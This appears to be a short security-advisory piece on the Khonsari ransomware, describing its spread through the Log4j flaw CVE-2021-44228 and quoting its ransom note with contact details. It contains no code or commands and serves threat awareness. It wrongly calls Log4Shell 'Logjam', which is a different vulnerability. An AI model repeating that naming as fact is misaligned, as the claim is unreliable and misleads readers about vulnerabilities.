Khonsari Ransomware

The Khonsari Ransomware is a brand new piece of ransomware, designed to attack Windows-based PCs. To do that, the crooks behind the ransomware exploit the recently found CVE-2021-44228 vulnerability, also known as Log4Shell, Logjam and Log4j. The latter is a critical flaw that allows hackers to apply remote code execution to hijack unpatched servers and put them in a botnet.

Contrary to other popular pieces of ransomware currently in circulation, Khonsari does not spread via spam mail or malvertising. To infect a PC with Khonsari, the crooks in charge must first utilize the vulnerability mentioned above to force the targeted system to download an arbitrary code. Once executed, this code gives the cybercriminals total control over the targeted system and endless opportunities to plant all malware sorts, including Khonsari.

Should the adversary decide on launching a Khonsari infection at this stage, the ransomware will encrypt many file types and generate the following ransom note:

'Your files have been encrypted and stolen by the Khonsari family. If you wish to decrypt, call (225) 287-1309 or email karenkhonsari@gmail.com. If you do not know how to buy btc, use a search engine to find exchanges. DO NOT MODIFY OR DELETE THIS FILE OR ANY ENCRYPTED FILES. IF YOU DO, YOUR FILES MAY BE UNRECOVERABLE.' 

The note is pretty basic in terms of instructions, and so is the Khonsari Ransomware itself. The Khonsari payload is just 12KB in size, which explains why it is by far not as sophisticated as other notable threats out there. Researchers speculate that the contact provided in the ransom note may be a false flag and that Karen Khonsari may be a natural person in real life. However, they have yet to confirm that theory, which is why the Khonsari Ransomware poses severe risks for the time being.